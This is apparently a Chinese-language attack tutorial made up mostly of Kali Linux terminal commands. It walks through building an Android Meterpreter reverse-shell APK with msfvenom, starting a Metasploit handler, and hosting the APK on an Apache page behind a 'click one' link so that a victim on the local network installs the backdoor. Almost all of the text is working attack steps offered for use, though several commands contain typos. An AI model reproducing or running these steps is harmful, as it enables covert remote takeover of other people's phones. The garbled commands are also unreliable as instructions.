root@kali:~# ping 192.168.0.106
root@kali:~# msfvenom
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp rhosts=192.168.0.106 rport=4444 R > /root/payload.apk
root@kali:~# msfconsole
开启监听模块:
msf5 > use expolit/multi/handler
设置攻击载荷:
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set rhosts 192.168.0.105
msf5 exploit(multi/handler) > set rport 4444
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > info
msf5 exploit(multi/handler) > run
网页投放:
root@kali:~# service apach2 start
root@kali:~# cd /var/www/html/
root@kali:~# ls -a
root@kali:~# vim index.html
添加属性文件:
<div class"main_page">
<a href=".payload.apk">click one</a>
root@kali:~# msfvenom
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp rhosts=192.168.0.106 rport=5555 R > /var/www/html/payload.apk
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set rhosts 192.168.0.106
msf5 exploit(multi/handler) > set rport 5555
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > info
msf5 exploit(multi/handler) > run
注:目标必须处于内网条件下,点击后门后,后台便会返回成功执行sessions,后期新版本是越更越烂,功能大不如从前,不如老版本给力!
网友评论